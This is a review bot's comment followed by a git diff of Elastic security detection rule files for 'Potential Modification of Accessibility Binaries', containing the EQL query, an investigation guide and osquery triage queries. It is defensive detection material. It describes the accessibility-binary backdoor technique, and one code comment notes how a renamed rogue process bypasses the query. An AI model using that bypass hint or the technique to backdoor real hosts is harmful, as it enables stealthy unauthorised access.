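Review bot: The new rule file carries no `setup` or `note` field, yet it can only ever fire when the building-block rule whose id is hardcoded in `query` (`kibana.alert.rule.rule_id:"1d72d014-e2ab-4707-b056-9b96abe7b511"`) is enabled and writing alerts into `.alerts-security.*`; the `description` calls that dependency "Discovery building block rule alert data" without naming or identifying it, so an operator enabling this rule alone gets silence with no hint why. A `setup` string such as `"setup": "This rule evaluates alerts produced by the Discovery building block rule with rule_id 1d72d014-e2ab-4707-b056-9b96abe7b511; that rule must be enabled, otherwise no alerts reach .alerts-security.* and this rule never fires."` would make the prerequisite visible where other rules in this package already document theirs. `required_fields` lists only the three fields the query references, so the `new_terms_fields` (`host.id`, `user.id`, `process.executable`) the rule keys on are not surfaced as dependencies either; mentioning them in the same setup text, or in a short `note` describing how to triage a new `process.executable` term, would help analysts. The `_1` version of this rule in the preceding hunk is only touched by the `ATT&CK` unescape, so I cannot tell from this view what changed between versions 1 and 2.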
+++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_104.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Modification of Accessibility Binaries", - "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). 
An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys 
accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", "references": [ "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" 
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_105.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_105.json
index fb4db6d39a7..b00ac740e5e 100644
--- a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_105.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Modification of Accessibility Binaries", - "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service 
Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service 
Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", "references": [ "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" 
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_106.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_106.json
index 78984d225d5..1efd055ec50 100644
--- a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_106.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Modification of Accessibility Binaries", - "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service 
Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service 
Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n",
 "references": [
 "https://www.elastic.co/blog/practical-security-engineering-stateful-detection"
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
